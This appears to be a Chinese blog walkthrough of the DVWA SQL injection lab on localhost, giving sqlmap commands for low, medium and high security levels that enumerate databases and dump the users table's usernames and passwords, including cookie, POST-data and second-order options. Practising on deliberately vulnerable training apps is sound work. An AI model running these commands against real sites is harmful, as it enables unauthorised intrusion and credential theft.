一、low级别
1、进入dvwa界面输入1,点击Submit,得到链接
http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#
![](https://i-blog.csdnimg.cn/blog_migrate/933e27684cd317932f7a03635a5496b7.png)
2、我们用sqlmap进行爆破
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#"
我们可以看到需要跳转到login的页面,所以,认为这里是需要cookie的。
![](https://i-blog.csdnimg.cn/blog_migrate/68681388b9c0012e80a02cb22eab61e6.png)
3、我们查看cookie后将它添加进去
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low"
![](https://i-blog.csdnimg.cn/blog_migrate/58bb6ee780e8d0af33934fc83b87ecab.png)
4、查询数据库
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -dbs
![](https://i-blog.csdnimg.cn/blog_migrate/e67584cad1fc0fa57f6a2262bc48d5a7.png)
5、查看dvwa数据库的表
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -tables
![](https://i-blog.csdnimg.cn/blog_migrate/e6385365fa0f3e5807663d0392faea29.png)
6、查看表中的字段名
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -T users --columns
![](https://i-blog.csdnimg.cn/blog_migrate/ccd43f17f2f78716c008229bd7b9a322.png)
7、获取字段的信息
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -T users -C user,password --dump
![](https://i-blog.csdnimg.cn/blog_migrate/4bcb174a9ada1df789bdfaf42e6dc744.png)
二、
Medium级别
1、我们输入1,点击Sumbit后发现URL没有改变
![](https://i-blog.csdnimg.cn/blog_migrate/5e626f32adf78e0632cbf27c6512ba52.png)
2、我们利用burpsuit抓包分析, 来查看post方式提交的数据
![](https://i-blog.csdnimg.cn/blog_migrate/d316806f897b495c04d199958fa9152c.png)
3、 由于这里是使用 post 方式进行传输的,所以我们这里需要使用 --data 参数把数据引入过来
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" --dbs 查看数据库
![](https://i-blog.csdnimg.cn/blog_migrate/d061dab9b883611a86e88e41a5dd8d6e.png)
4、查看dvwa数据库下的表
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -tables
![](https://i-blog.csdnimg.cn/blog_migrate/d061dab9b883611a86e88e41a5dd8d6e.png)
5、查看字段名
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -T users --columns
![](https://i-blog.csdnimg.cn/blog_migrate/60eca303a24f30d6e2bb75fe847c6be6.png)
6、获取字段中的信息
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -T users -C user,password --dump
![](https://i-blog.csdnimg.cn/blog_migrate/edc2b9691130fd50cec7cc22ffa7c6b3.png)
三、High级别
1、首先我们注意到这个页面,点击之后会跳转到另外一个页面,所以这个如果想使用sqlmap进行爆破,我们还需要引入一个知识点(参考别人的博客得到)
–second-order(二阶sql注入)
有些时候注入点输入的数据看返回结果的时候并不是当前的页面,而是另外的一个页面,这时候就需要你指定到哪个页面获取响应判断真假。
-–second-order后面跟一个判断页面的URL地址。 (来自简书 作者 m3lon)
![](https://i-blog.csdnimg.cn/blog_migrate/f680a893a3106a4216bcad78f8068f24.png)
2、 我们利用burpsuite进行抓包,因为这里无法在页面上获取 post 或者 get 的值。
![](https://i-blog.csdnimg.cn/blog_migrate/ca59bf0d5326af3e6e028a7e0fff6451.png)
3、我们发现获取到的数据和Medium类似,我们利用sqlmap进行注入
sqlmap.py -u "localhost/dvwa-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=high; " --second-url "http://localhost/dvwa-master/vulnerabilities/sqli/" -dbs
4、和low级别,medium级别过程一样,我们同样可以获取到数据
sqlmap.py -u "localhost/dvwa-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=high; " --second-url "http://localhost/dvwa-master/vulnerabilities/sqli/" -D dvwa -T users -C user,password --dump
![](https://i-blog.csdnimg.cn/blog_migrate/1772364fa54e19bea9b658d428a48eb0.png)